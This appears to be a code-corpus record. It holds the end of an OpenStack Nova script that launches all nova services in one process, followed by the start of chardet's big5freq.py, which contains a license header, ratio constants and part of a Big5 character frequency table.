CONF.import_opt('manager', 'nova.conductor.api', group='conductor')
CONF.import_opt('topic', 'nova.conductor.api', group='conductor')
CONF.import_opt('enabled_apis', 'nova.service')
CONF.import_opt('enabled_ssl_apis', 'nova.service')
def main():
    """Launch every enabled nova service inside a single process.

    Each service runs in its own greenthread; a failure (or sys.exit)
    while starting one service is logged and the remaining services are
    still attempted.
    """
    config.parse_args(sys.argv)
    logging.setup(CONF, "nova")
    LOG = logging.getLogger('nova.all')
    utils.monkey_patch()
    objects.register_all()
    launcher = service.process_launcher()

    # nova-api: one WSGI service per enabled API, with SSL where configured.
    for api in CONF.enabled_apis:
        try:
            should_use_ssl = api in CONF.enabled_ssl_apis
            server = service.WSGIService(api, use_ssl=should_use_ssl)
            launcher.launch_service(server, workers=server.workers or 1)
        except (Exception, SystemExit):
            LOG.exception(_LE('Failed to load %s-api'), api)

    # Auxiliary WSGI servers: S3 objectstore and XVP VNC proxy.
    for mod in [s3server, xvp_proxy]:
        try:
            launcher.launch_service(mod.get_wsgi_server())
        except (Exception, SystemExit):
            LOG.exception(_LE('Failed to load %s'), mod.__name__)

    # RPC-style services.
    for binary in ['nova-compute', 'nova-network', 'nova-scheduler',
                   'nova-cert', 'nova-conductor']:

        # FIXME(sirp): Most service configs are defined in nova/service.py, but
        # conductor has set a new precedent of storing these configs
        # nova/<service>/api.py.
        #
        # We should update the existing services to use this new approach so we
        # don't have to treat conductor differently here.
        if binary == 'nova-conductor':
            topic = CONF.conductor.topic
            manager = CONF.conductor.manager
        else:
            topic = None
            manager = None

        try:
            launcher.launch_service(service.Service.create(binary=binary,
                                                           topic=topic,
                                                           manager=manager))
        except (Exception, SystemExit):
            LOG.exception(_LE('Failed to load %s'), binary)
    launcher.wait()
gitgitcode/myflask | venv/lib/python2.7/site-packages/pip/_vendor/requests/packages/chardet/big5freq.py | 3133 | 82594 | ######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Communicator client code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
# Big5 frequency table
# by Taiwan's Mandarin Promotion Council
# <http://www.edu.tw:81/mandr/>
#
# 128 --> 0.42261
# 256 --> 0.57851
# 512 --> 0.74851
# 1024 --> 0.89384
# 2048 --> 0.97583
#
# Ideal Distribution Ratio = 0.74851/(1-0.74851) =2.98
# Random Distribution Ration = 512/(5401-512)=0.105
#
# Typical Distribution Ratio about 25% of Ideal one, still much higher than RDR
# Typical distribution ratio for Big5 text: about 25% of the ideal ratio
# (2.98, derived above), which is still much higher than the random
# distribution ratio (~0.105) — see the calculations in the header comments.
BIG5_TYPICAL_DISTRIBUTION_RATIO = 0.75
# Size of the meaningful portion of the char-to-frequency-order table below;
# entries whose frequency order is >= this value are of no interest for
# detection purposes (see the marker comment inside the table).
BIG5_TABLE_SIZE = 5376
Big5CharToFreqOrder = (
1,1801,1506, 255,1431, 198, 9, 82, 6,5008, 177, 202,3681,1256,2821, 110, # 16
3814, 33,3274, 261, 76, 44,2114, 16,2946,2187,1176, 659,3971, 26,3451,2653, # 32
1198,3972,3350,4202, 410,2215, 302, 590, 361,1964, 8, 204, 58,4510,5009,1932, # 48
63,5010,5011, 317,1614, 75, 222, 159,4203,2417,1480,5012,3555,3091, 224,2822, # 64
3682, 3, 10,3973,1471, 29,2787,1135,2866,1940, 873, 130,3275,1123, 312,5013, # 80
4511,2052, 507, 252, 682,5014, 142,1915, 124, 206,2947, 34,3556,3204, 64, 604, # 96
5015,2501,1977,1978, 155,1991, 645, 641,1606,5016,3452, 337, 72, 406,5017, 80, # 112
630, 238,3205,1509, 263, 939,1092,2654, 756,1440,1094,3453, 449, 69,2987, 591, # 128
179,2096, 471, 115,2035,1844, 60, 50,2988, 134, 806,1869, 734,2036,3454, 180, # 144
995,1607, 156, 537,2907, 688,5018, 319,1305, 779,2145, 514,2379, 298,4512, 359, # 160
2502, 90,2716,1338, 663, 11, 906,1099,2553, 20,2441, 182, 532,1716,5019, 732, # 176
1376,4204,1311,1420,3206, 25,2317,1056, 113, 399, 382,1950, 242,3455,2474, 529, # 192
3276, 475,1447,3683,5020, 117, 21, 656, 810,1297,2300,2334,3557,5021, 126,4205, # 208
706, 456, 150, 613,4513, 71,1118,2037,4206, 145,3092, 85, 835, 486,2115,1246, # 224
1426, 428, 727,1285,1015, 800, 106, 623, 303,1281,5022,2128,2359, 347,3815, 221, # 240
3558,3135,5023,1956,1153,4207, 83, 296,1199,3093, 192, 624, 93,5024, 822,1898, # 256
2823,3136, 795,2065, 991,1554,1542,1592, 27, 43,2867, 859, 139,1456, 860,4514, # 272
437, 712,3974, 164,2397,3137, 695, 211,3037,2097, 195,3975,1608,3559,3560,3684, # 288
3976, 234, 811,2989,2098,3977,2233,1441,3561,1615,2380, 668,2077,1638, 305, 228, # 304
1664,4515, 467, 415,5025, 262,2099,1593, 239, 108, 300, 200,1033, 512,1247,2078, # 320
5026,5027,2176,3207,3685,2682, 593, 845,1062,3277, 88,1723,2038,3978,1951, 212, # 336
266, 152, 149, 468,1899,4208,4516, 77, 187,5028,3038, 37, 5,2990,5029,3979, # 352
5030,5031, 39,2524,4517,2908,3208,2079, 55, 148, 74,4518, 545, 483,1474,1029, # 368
1665, 217,1870,1531,3138,1104,2655,4209, 24, 172,3562, 900,3980,3563,3564,4519, # 384
32,1408,2824,1312, 329, 487,2360,2251,2717, 784,2683, 4,3039,3351,1427,1789, # 400
188, 109, 499,5032,3686,1717,1790, 888,1217,3040,4520,5033,3565,5034,3352,1520, # 416
3687,3981, 196,1034, 775,5035,5036, 929,1816, 249, 439, 38,5037,1063,5038, 794, # 432
3982,1435,2301, 46, 178,3278,2066,5039,2381,5040, 214,1709,4521, 804, 35, 707, # 448
324,3688,1601,2554, 140, 459,4210,5041,5042,1365, 839, 272, 978,2262,2580,3456, # 464
2129,1363,3689,1423, 697, 100,3094, 48, 70,1231, 495,3139,2196,5043,1294,5044, # 480
2080, 462, 586,1042,3279, 853, 256, 988, 185,2382,3457,1698, 434,1084,5045,3458, # 496
314,2625,2788,4522,2335,2336, 569,2285, 637,1817,2525, 757,1162,1879,1616,3459, # 512
287,1577,2116, 768,4523,1671,2868,3566,2526,1321,3816, 909,2418,5046,4211, 933, # 528
3817,4212,2053,2361,1222,4524, 765,2419,1322, 786,4525,5047,1920,1462,1677,2909, # 544
1699,5048,4526,1424,2442,3140,3690,2600,3353,1775,1941,3460,3983,4213, 309,1369, # 560
1130,2825, 364,2234,1653,1299,3984,3567,3985,3986,2656, 525,1085,3041, 902,2001, # 576
1475, 964,4527, 421,1845,1415,1057,2286, 940,1364,3141, 376,4528,4529,1381, 7, # 592
2527, 983,2383, 336,1710,2684,1846, 321,3461, 559,1131,3042,2752,1809,1132,1313, # 608
265,1481,1858,5049, 352,1203,2826,3280, 167,1089, 420,2827, 776, 792,1724,3568, # 624
4214,2443,3281,5050,4215,5051, 446, 229, 333,2753, 901,3818,1200,1557,4530,2657, # 640
1921, 395,2754,2685,3819,4216,1836, 125, 916,3209,2626,4531,5052,5053,3820,5054, # 656
5055,5056,4532,3142,3691,1133,2555,1757,3462,1510,2318,1409,3569,5057,2146, 438, # 672
2601,2910,2384,3354,1068, 958,3043, 461, 311,2869,2686,4217,1916,3210,4218,1979, # 688
383, 750,2755,2627,4219, 274, 539, 385,1278,1442,5058,1154,1965, 384, 561, 210, # 704
98,1295,2556,3570,5059,1711,2420,1482,3463,3987,2911,1257, 129,5060,3821, 642, # 720
523,2789,2790,2658,5061, 141,2235,1333, 68, 176, 441, 876, 907,4220, 603,2602, # 736
710, 171,3464, 404, 549, 18,3143,2398,1410,3692,1666,5062,3571,4533,2912,4534, # 752
5063,2991, 368,5064, 146, 366, 99, 871,3693,1543, 748, 807,1586,1185, 22,2263, # 768
379,3822,3211,5065,3212, 505,1942,2628,1992,1382,2319,5066, 380,2362, 218, 702, # 784
1818,1248,3465,3044,3572,3355,3282,5067,2992,3694, 930,3283,3823,5068, 59,5069, # 800
585, 601,4221, 497,3466,1112,1314,4535,1802,5070,1223,1472,2177,5071, 749,1837, # 816
690,1900,3824,1773,3988,1476, 429,1043,1791,2236,2117, 917,4222, 447,1086,1629, # 832
5072, 556,5073,5074,2021,1654, 844,1090, 105, 550, 966,1758,2828,1008,1783, 686, # 848
1095,5075,2287, 793,1602,5076,3573,2603,4536,4223,2948,2302,4537,3825, 980,2503, # 864
544, 353, 527,4538, 908,2687,2913,5077, 381,2629,1943,1348,5078,1341,1252, 560, # 880
3095,5079,3467,2870,5080,2054, 973, 886,2081, 143,4539,5081,5082, 157,3989, 496, # 896
4224, 57, 840, 540,2039,4540,4541,3468,2118,1445, 970,2264,1748,1966,2082,4225, # 912
3144,1234,1776,3284,2829,3695, 773,1206,2130,1066,2040,1326,3990,1738,1725,4226, # 928
279,3145, 51,1544,2604, 423,1578,2131,2067, 173,4542,1880,5083,5084,1583, 264, # 944
610,3696,4543,2444, 280, 154,5085,5086,5087,1739, 338,1282,3096, 693,2871,1411, # 960
1074,3826,2445,5088,4544,5089,5090,1240, 952,2399,5091,2914,1538,2688, 685,1483, # 976
4227,2475,1436, 953,4228,2055,4545, 671,2400, 79,4229,2446,3285, 608, 567,2689, # 992
3469,4230,4231,1691, 393,1261,1792,2401,5092,4546,5093,5094,5095,5096,1383,1672, # 1008
3827,3213,1464, 522,1119, 661,1150, 216, 675,4547,3991,1432,3574, 609,4548,2690, # 1024
2402,5097,5098,5099,4232,3045, 0,5100,2476, 315, 231,2447, 301,3356,4549,2385, # 1040
5101, 233,4233,3697,1819,4550,4551,5102, 96,1777,1315,2083,5103, 257,5104,1810, # 1056
3698,2718,1139,1820,4234,2022,1124,2164,2791,1778,2659,5105,3097, 363,1655,3214, # 1072
5106,2993,5107,5108,5109,3992,1567,3993, 718, 103,3215, 849,1443, 341,3357,2949, # 1088
1484,5110,1712, 127, 67, 339,4235,2403, 679,1412, 821,5111,5112, 834, 738, 351, # 1104
2994,2147, 846, 235,1497,1881, 418,1993,3828,2719, 186,1100,2148,2756,3575,1545, # 1120
1355,2950,2872,1377, 583,3994,4236,2581,2995,5113,1298,3699,1078,2557,3700,2363, # 1136
78,3829,3830, 267,1289,2100,2002,1594,4237, 348, 369,1274,2197,2178,1838,4552, # 1152
1821,2830,3701,2757,2288,2003,4553,2951,2758, 144,3358, 882,4554,3995,2759,3470, # 1168
4555,2915,5114,4238,1726, 320,5115,3996,3046, 788,2996,5116,2831,1774,1327,2873, # 1184
3997,2832,5117,1306,4556,2004,1700,3831,3576,2364,2660, 787,2023, 506, 824,3702, # 1200
534, 323,4557,1044,3359,2024,1901, 946,3471,5118,1779,1500,1678,5119,1882,4558, # 1216
165, 243,4559,3703,2528, 123, 683,4239, 764,4560, 36,3998,1793, 589,2916, 816, # 1232
626,1667,3047,2237,1639,1555,1622,3832,3999,5120,4000,2874,1370,1228,1933, 891, # 1248
2084,2917, 304,4240,5121, 292,2997,2720,3577, 691,2101,4241,1115,4561, 118, 662, # 1264
5122, 611,1156, 854,2386,1316,2875, 2, 386, 515,2918,5123,5124,3286, 868,2238, # 1280
1486, 855,2661, 785,2216,3048,5125,1040,3216,3578,5126,3146, 448,5127,1525,5128, # 1296
2165,4562,5129,3833,5130,4242,2833,3579,3147, 503, 818,4001,3148,1568, 814, 676, # 1312
1444, 306,1749,5131,3834,1416,1030, 197,1428, 805,2834,1501,4563,5132,5133,5134, # 1328
1994,5135,4564,5136,5137,2198, 13,2792,3704,2998,3149,1229,1917,5138,3835,2132, # 1344
5139,4243,4565,2404,3580,5140,2217,1511,1727,1120,5141,5142, 646,3836,2448, 307, # 1360
5143,5144,1595,3217,5145,5146,5147,3705,1113,1356,4002,1465,2529,2530,5148, 519, # 1376
5149, 128,2133, 92,2289,1980,5150,4003,1512, 342,3150,2199,5151,2793,2218,1981, # 1392
3360,4244, 290,1656,1317, 789, 827,2365,5152,3837,4566, 562, 581,4004,5153, 401, # 1408
4567,2252, 94,4568,5154,1399,2794,5155,1463,2025,4569,3218,1944,5156, 828,1105, # 1424
4245,1262,1394,5157,4246, 605,4570,5158,1784,2876,5159,2835, 819,2102, 578,2200, # 1440
2952,5160,1502, 436,3287,4247,3288,2836,4005,2919,3472,3473,5161,2721,2320,5162, # 1456
5163,2337,2068, 23,4571, 193, 826,3838,2103, 699,1630,4248,3098, 390,1794,1064, # 1472
3581,5164,1579,3099,3100,1400,5165,4249,1839,1640,2877,5166,4572,4573, 137,4250, # 1488
598,3101,1967, 780, 104, 974,2953,5167, 278, 899, 253, 402, 572, 504, 493,1339, # 1504
5168,4006,1275,4574,2582,2558,5169,3706,3049,3102,2253, 565,1334,2722, 863, 41, # 1520
5170,5171,4575,5172,1657,2338, 19, 463,2760,4251, 606,5173,2999,3289,1087,2085, # 1536
1323,2662,3000,5174,1631,1623,1750,4252,2691,5175,2878, 791,2723,2663,2339, 232, # 1552
2421,5176,3001,1498,5177,2664,2630, 755,1366,3707,3290,3151,2026,1609, 119,1918, # 1568
3474, 862,1026,4253,5178,4007,3839,4576,4008,4577,2265,1952,2477,5179,1125, 817, # 1584
4254,4255,4009,1513,1766,2041,1487,4256,3050,3291,2837,3840,3152,5180,5181,1507, # 1600
5182,2692, 733, 40,1632,1106,2879, 345,4257, 841,2531, 230,4578,3002,1847,3292, # 1616
3475,5183,1263, 986,3476,5184, 735, 879, 254,1137, 857, 622,1300,1180,1388,1562, # 1632
4010,4011,2954, 967,2761,2665,1349, 592,2134,1692,3361,3003,1995,4258,1679,4012, # 1648
1902,2188,5185, 739,3708,2724,1296,1290,5186,4259,2201,2202,1922,1563,2605,2559, # 1664
1871,2762,3004,5187, 435,5188, 343,1108, 596, 17,1751,4579,2239,3477,3709,5189, # 1680
4580, 294,3582,2955,1693, 477, 979, 281,2042,3583, 643,2043,3710,2631,2795,2266, # 1696
1031,2340,2135,2303,3584,4581, 367,1249,2560,5190,3585,5191,4582,1283,3362,2005, # 1712
240,1762,3363,4583,4584, 836,1069,3153, 474,5192,2149,2532, 268,3586,5193,3219, # 1728
1521,1284,5194,1658,1546,4260,5195,3587,3588,5196,4261,3364,2693,1685,4262, 961, # 1744
1673,2632, 190,2006,2203,3841,4585,4586,5197, 570,2504,3711,1490,5198,4587,2633, # 1760
3293,1957,4588, 584,1514, 396,1045,1945,5199,4589,1968,2449,5200,5201,4590,4013, # 1776
619,5202,3154,3294, 215,2007,2796,2561,3220,4591,3221,4592, 763,4263,3842,4593, # 1792
5203,5204,1958,1767,2956,3365,3712,1174, 452,1477,4594,3366,3155,5205,2838,1253, # 1808
2387,2189,1091,2290,4264, 492,5206, 638,1169,1825,2136,1752,4014, 648, 926,1021, # 1824
1324,4595, 520,4596, 997, 847,1007, 892,4597,3843,2267,1872,3713,2405,1785,4598, # 1840
1953,2957,3103,3222,1728,4265,2044,3714,4599,2008,1701,3156,1551, 30,2268,4266, # 1856
5207,2027,4600,3589,5208, 501,5209,4267, 594,3478,2166,1822,3590,3479,3591,3223, # 1872
829,2839,4268,5210,1680,3157,1225,4269,5211,3295,4601,4270,3158,2341,5212,4602, # 1888
4271,5213,4015,4016,5214,1848,2388,2606,3367,5215,4603, 374,4017, 652,4272,4273, # 1904
375,1140, 798,5216,5217,5218,2366,4604,2269, 546,1659, 138,3051,2450,4605,5219, # 1920
2254, 612,1849, 910, 796,3844,1740,1371, 825,3845,3846,5220,2920,2562,5221, 692, # 1936
444,3052,2634, 801,4606,4274,5222,1491, 244,1053,3053,4275,4276, 340,5223,4018, # 1952
1041,3005, 293,1168, 87,1357,5224,1539, 959,5225,2240, 721, 694,4277,3847, 219, # 1968
1478, 644,1417,3368,2666,1413,1401,1335,1389,4019,5226,5227,3006,2367,3159,1826, # 1984
730,1515, 184,2840, 66,4607,5228,1660,2958, 246,3369, 378,1457, 226,3480, 975, # 2000
4020,2959,1264,3592, 674, 696,5229, 163,5230,1141,2422,2167, 713,3593,3370,4608, # 2016
4021,5231,5232,1186, 15,5233,1079,1070,5234,1522,3224,3594, 276,1050,2725, 758, # 2032
1126, 653,2960,3296,5235,2342, 889,3595,4022,3104,3007, 903,1250,4609,4023,3481, # 2048
3596,1342,1681,1718, 766,3297, 286, 89,2961,3715,5236,1713,5237,2607,3371,3008, # 2064
5238,2962,2219,3225,2880,5239,4610,2505,2533, 181, 387,1075,4024, 731,2190,3372, # 2080
5240,3298, 310, 313,3482,2304, 770,4278, 54,3054, 189,4611,3105,3848,4025,5241, # 2096
1230,1617,1850, 355,3597,4279,4612,3373, 111,4280,3716,1350,3160,3483,3055,4281, # 2112
2150,3299,3598,5242,2797,4026,4027,3009, 722,2009,5243,1071, 247,1207,2343,2478, # 2128
1378,4613,2010, 864,1437,1214,4614, 373,3849,1142,2220, 667,4615, 442,2763,2563, # 2144
3850,4028,1969,4282,3300,1840, 837, 170,1107, 934,1336,1883,5244,5245,2119,4283, # 2160
2841, 743,1569,5246,4616,4284, 582,2389,1418,3484,5247,1803,5248, 357,1395,1729, # 2176
3717,3301,2423,1564,2241,5249,3106,3851,1633,4617,1114,2086,4285,1532,5250, 482, # 2192
2451,4618,5251,5252,1492, 833,1466,5253,2726,3599,1641,2842,5254,1526,1272,3718, # 2208
4286,1686,1795, 416,2564,1903,1954,1804,5255,3852,2798,3853,1159,2321,5256,2881, # 2224
4619,1610,1584,3056,2424,2764, 443,3302,1163,3161,5257,5258,4029,5259,4287,2506, # 2240
3057,4620,4030,3162,2104,1647,3600,2011,1873,4288,5260,4289, 431,3485,5261, 250, # 2256
97, 81,4290,5262,1648,1851,1558, 160, 848,5263, 866, 740,1694,5264,2204,2843, # 2272
3226,4291,4621,3719,1687, 950,2479, 426, 469,3227,3720,3721,4031,5265,5266,1188, # 2288
424,1996, 861,3601,4292,3854,2205,2694, 168,1235,3602,4293,5267,2087,1674,4622, # 2304
3374,3303, 220,2565,1009,5268,3855, 670,3010, 332,1208, 717,5269,5270,3603,2452, # 2320
4032,3375,5271, 513,5272,1209,2882,3376,3163,4623,1080,5273,5274,5275,5276,2534, # 2336
3722,3604, 815,1587,4033,4034,5277,3605,3486,3856,1254,4624,1328,3058,1390,4035, # 2352
1741,4036,3857,4037,5278, 236,3858,2453,3304,5279,5280,3723,3859,1273,3860,4625, # 2368
5281, 308,5282,4626, 245,4627,1852,2480,1307,2583, 430, 715,2137,2454,5283, 270, # 2384
199,2883,4038,5284,3606,2727,1753, 761,1754, 725,1661,1841,4628,3487,3724,5285, # 2400
5286, 587, 14,3305, 227,2608, 326, 480,2270, 943,2765,3607, 291, 650,1884,5287, # 2416
1702,1226, 102,1547, 62,3488, 904,4629,3489,1164,4294,5288,5289,1224,1548,2766, # 2432
391, 498,1493,5290,1386,1419,5291,2056,1177,4630, 813, 880,1081,2368, 566,1145, # 2448
4631,2291,1001,1035,2566,2609,2242, 394,1286,5292,5293,2069,5294, 86,1494,1730, # 2464
4039, 491,1588, 745, 897,2963, 843,3377,4040,2767,2884,3306,1768, 998,2221,2070, # 2480
397,1827,1195,1970,3725,3011,3378, 284,5295,3861,2507,2138,2120,1904,5296,4041, # 2496
2151,4042,4295,1036,3490,1905, 114,2567,4296, 209,1527,5297,5298,2964,2844,2635, # 2512
2390,2728,3164, 812,2568,5299,3307,5300,1559, 737,1885,3726,1210, 885, 28,2695, # 2528
3608,3862,5301,4297,1004,1780,4632,5302, 346,1982,2222,2696,4633,3863,1742, 797, # 2544
1642,4043,1934,1072,1384,2152, 896,4044,3308,3727,3228,2885,3609,5303,2569,1959, # 2560
4634,2455,1786,5304,5305,5306,4045,4298,1005,1308,3728,4299,2729,4635,4636,1528, # 2576
2610, 161,1178,4300,1983, 987,4637,1101,4301, 631,4046,1157,3229,2425,1343,1241, # 2592
1016,2243,2570, 372, 877,2344,2508,1160, 555,1935, 911,4047,5307, 466,1170, 169, # 2608
1051,2921,2697,3729,2481,3012,1182,2012,2571,1251,2636,5308, 992,2345,3491,1540, # 2624
2730,1201,2071,2406,1997,2482,5309,4638, 528,1923,2191,1503,1874,1570,2369,3379, # 2640
3309,5310, 557,1073,5311,1828,3492,2088,2271,3165,3059,3107, 767,3108,2799,4639, # 2656
1006,4302,4640,2346,1267,2179,3730,3230, 778,4048,3231,2731,1597,2667,5312,4641, # 2672
5313,3493,5314,5315,5316,3310,2698,1433,3311, 131, 95,1504,4049, 723,4303,3166, # 2688
1842,3610,2768,2192,4050,2028,2105,3731,5317,3013,4051,1218,5318,3380,3232,4052, # 2704
4304,2584, 248,1634,3864, 912,5319,2845,3732,3060,3865, 654, 53,5320,3014,5321, # 2720
1688,4642, 777,3494,1032,4053,1425,5322, 191, 820,2121,2846, 971,4643, 931,3233, # 2736
135, 664, 783,3866,1998, 772,2922,1936,4054,3867,4644,2923,3234, 282,2732, 640, # 2752
1372,3495,1127, 922, 325,3381,5323,5324, 711,2045,5325,5326,4055,2223,2800,1937, # 2768
4056,3382,2224,2255,3868,2305,5327,4645,3869,1258,3312,4057,3235,2139,2965,4058, # 2784
4059,5328,2225, 258,3236,4646, 101,1227,5329,3313,1755,5330,1391,3314,5331,2924, # 2800
2057, 893,5332,5333,5334,1402,4305,2347,5335,5336,3237,3611,5337,5338, 878,1325, # 2816
1781,2801,4647, 259,1385,2585, 744,1183,2272,4648,5339,4060,2509,5340, 684,1024, # 2832
4306,5341, 472,3612,3496,1165,3315,4061,4062, 322,2153, 881, 455,1695,1152,1340, # 2848
660, 554,2154,4649,1058,4650,4307, 830,1065,3383,4063,4651,1924,5342,1703,1919, # 2864
5343, 932,2273, 122,5344,4652, 947, 677,5345,3870,2637, 297,1906,1925,2274,4653, # 2880
2322,3316,5346,5347,4308,5348,4309, 84,4310, 112, 989,5349, 547,1059,4064, 701, # 2896
3613,1019,5350,4311,5351,3497, 942, 639, 457,2306,2456, 993,2966, 407, 851, 494, # 2912
4654,3384, 927,5352,1237,5353,2426,3385, 573,4312, 680, 921,2925,1279,1875, 285, # 2928
790,1448,1984, 719,2168,5354,5355,4655,4065,4066,1649,5356,1541, 563,5357,1077, # 2944
5358,3386,3061,3498, 511,3015,4067,4068,3733,4069,1268,2572,3387,3238,4656,4657, # 2960
5359, 535,1048,1276,1189,2926,2029,3167,1438,1373,2847,2967,1134,2013,5360,4313, # 2976
1238,2586,3109,1259,5361, 700,5362,2968,3168,3734,4314,5363,4315,1146,1876,1907, # 2992
4658,2611,4070, 781,2427, 132,1589, 203, 147, 273,2802,2407, 898,1787,2155,4071, # 3008
4072,5364,3871,2803,5365,5366,4659,4660,5367,3239,5368,1635,3872, 965,5369,1805, # 3024
2699,1516,3614,1121,1082,1329,3317,4073,1449,3873, 65,1128,2848,2927,2769,1590, # 3040
3874,5370,5371, 12,2668, 45, 976,2587,3169,4661, 517,2535,1013,1037,3240,5372, # 3056
3875,2849,5373,3876,5374,3499,5375,2612, 614,1999,2323,3877,3110,2733,2638,5376, # 3072
2588,4316, 599,1269,5377,1811,3735,5378,2700,3111, 759,1060, 489,1806,3388,3318, # 3088
1358,5379,5380,2391,1387,1215,2639,2256, 490,5381,5382,4317,1759,2392,2348,5383, # 3104
4662,3878,1908,4074,2640,1807,3241,4663,3500,3319,2770,2349, 874,5384,5385,3501, # 3120
3736,1859, 91,2928,3737,3062,3879,4664,5386,3170,4075,2669,5387,3502,1202,1403, # 3136
3880,2969,2536,1517,2510,4665,3503,2511,5388,4666,5389,2701,1886,1495,1731,4076, # 3152
2370,4667,5390,2030,5391,5392,4077,2702,1216, 237,2589,4318,2324,4078,3881,4668, # 3168
4669,2703,3615,3504, 445,4670,5393,5394,5395,5396,2771, 61,4079,3738,1823,4080, # 3184
5397, 687,2046, 935, 925, 405,2670, 703,1096,1860,2734,4671,4081,1877,1367,2704, # 3200
3389, 918,2106,1782,2483, 334,3320,1611,1093,4672, 564,3171,3505,3739,3390, 945, # 3216
2641,2058,4673,5398,1926, 872,4319,5399,3506,2705,3112, 349,4320,3740,4082,4674, # 3232
3882,4321,3741,2156,4083,4675,4676,4322,4677,2408,2047, 782,4084, 400, 251,4323, # 3248
1624,5400,5401, 277,3742, 299,1265, 476,1191,3883,2122,4324,4325,1109, 205,5402, # 3264
2590,1000,2157,3616,1861,5403,5404,5405,4678,5406,4679,2573, 107,2484,2158,4085, # 3280
3507,3172,5407,1533, 541,1301, 158, 753,4326,2886,3617,5408,1696, 370,1088,4327, # 3296
4680,3618, 579, 327, 440, 162,2244, 269,1938,1374,3508, 968,3063, 56,1396,3113, # 3312
2107,3321,3391,5409,1927,2159,4681,3016,5410,3619,5411,5412,3743,4682,2485,5413, # 3328
2804,5414,1650,4683,5415,2613,5416,5417,4086,2671,3392,1149,3393,4087,3884,4088, # 3344
5418,1076, 49,5419, 951,3242,3322,3323, 450,2850, 920,5420,1812,2805,2371,4328, # 3360
1909,1138,2372,3885,3509,5421,3243,4684,1910,1147,1518,2428,4685,3886,5422,4686, # 3376
2393,2614, 260,1796,3244,5423,5424,3887,3324, 708,5425,3620,1704,5426,3621,1351, # 3392
1618,3394,3017,1887, 944,4329,3395,4330,3064,3396,4331,5427,3744, 422, 413,1714, # 3408
3325, 500,2059,2350,4332,2486,5428,1344,1911, 954,5429,1668,5430,5431,4089,2409, # 3424
4333,3622,3888,4334,5432,2307,1318,2512,3114, 133,3115,2887,4687, 629, 31,2851, # 3440
2706,3889,4688, 850, 949,4689,4090,2970,1732,2089,4335,1496,1853,5433,4091, 620, # 3456
3245, 981,1242,3745,3397,1619,3746,1643,3326,2140,2457,1971,1719,3510,2169,5434, # 3472
3246,5435,5436,3398,1829,5437,1277,4690,1565,2048,5438,1636,3623,3116,5439, 869, # 3488
2852, 655,3890,3891,3117,4092,3018,3892,1310,3624,4691,5440,5441,5442,1733, 558, # 3504
4692,3747, 335,1549,3065,1756,4336,3748,1946,3511,1830,1291,1192, 470,2735,2108, # 3520
2806, 913,1054,4093,5443,1027,5444,3066,4094,4693, 982,2672,3399,3173,3512,3247, # 3536
3248,1947,2807,5445, 571,4694,5446,1831,5447,3625,2591,1523,2429,5448,2090, 984, # 3552
4695,3749,1960,5449,3750, 852, 923,2808,3513,3751, 969,1519, 999,2049,2325,1705, # 3568
5450,3118, 615,1662, 151, 597,4095,2410,2326,1049, 275,4696,3752,4337, 568,3753, # 3584
3626,2487,4338,3754,5451,2430,2275, 409,3249,5452,1566,2888,3514,1002, 769,2853, # 3600
194,2091,3174,3755,2226,3327,4339, 628,1505,5453,5454,1763,2180,3019,4096, 521, # 3616
1161,2592,1788,2206,2411,4697,4097,1625,4340,4341, 412, 42,3119, 464,5455,2642, # 3632
4698,3400,1760,1571,2889,3515,2537,1219,2207,3893,2643,2141,2373,4699,4700,3328, # 3648
1651,3401,3627,5456,5457,3628,2488,3516,5458,3756,5459,5460,2276,2092, 460,5461, # 3664
4701,5462,3020, 962, 588,3629, 289,3250,2644,1116, 52,5463,3067,1797,5464,5465, # 3680
5466,1467,5467,1598,1143,3757,4342,1985,1734,1067,4702,1280,3402, 465,4703,1572, # 3696
510,5468,1928,2245,1813,1644,3630,5469,4704,3758,5470,5471,2673,1573,1534,5472, # 3712
5473, 536,1808,1761,3517,3894,3175,2645,5474,5475,5476,4705,3518,2929,1912,2809, # 3728
5477,3329,1122, 377,3251,5478, 360,5479,5480,4343,1529, 551,5481,2060,3759,1769, # 3744
2431,5482,2930,4344,3330,3120,2327,2109,2031,4706,1404, 136,1468,1479, 672,1171, # 3760
3252,2308, 271,3176,5483,2772,5484,2050, 678,2736, 865,1948,4707,5485,2014,4098, # 3776
2971,5486,2737,2227,1397,3068,3760,4708,4709,1735,2931,3403,3631,5487,3895, 509, # 3792
2854,2458,2890,3896,5488,5489,3177,3178,4710,4345,2538,4711,2309,1166,1010, 552, # 3808
681,1888,5490,5491,2972,2973,4099,1287,1596,1862,3179, 358, 453, 736, 175, 478, # 3824
1117, 905,1167,1097,5492,1854,1530,5493,1706,5494,2181,3519,2292,3761,3520,3632, # 3840
4346,2093,4347,5495,3404,1193,2489,4348,1458,2193,2208,1863,1889,1421,3331,2932, # 3856
3069,2182,3521, 595,2123,5496,4100,5497,5498,4349,1707,2646, 223,3762,1359, 751, # 3872
3121, 183,3522,5499,2810,3021, 419,2374, 633, 704,3897,2394, 241,5500,5501,5502, # 3888
838,3022,3763,2277,2773,2459,3898,1939,2051,4101,1309,3122,2246,1181,5503,1136, # 3904
2209,3899,2375,1446,4350,2310,4712,5504,5505,4351,1055,2615, 484,3764,5506,4102, # 3920
625,4352,2278,3405,1499,4353,4103,5507,4104,4354,3253,2279,2280,3523,5508,5509, # 3936
2774, 808,2616,3765,3406,4105,4355,3123,2539, 526,3407,3900,4356, 955,5510,1620, # 3952
4357,2647,2432,5511,1429,3766,1669,1832, 994, 928,5512,3633,1260,5513,5514,5515, # 3968
1949,2293, 741,2933,1626,4358,2738,2460, 867,1184, 362,3408,1392,5516,5517,4106, # 3984
4359,1770,1736,3254,2934,4713,4714,1929,2707,1459,1158,5518,3070,3409,2891,1292, # 4000
1930,2513,2855,3767,1986,1187,2072,2015,2617,4360,5519,2574,2514,2170,3768,2490, # 4016
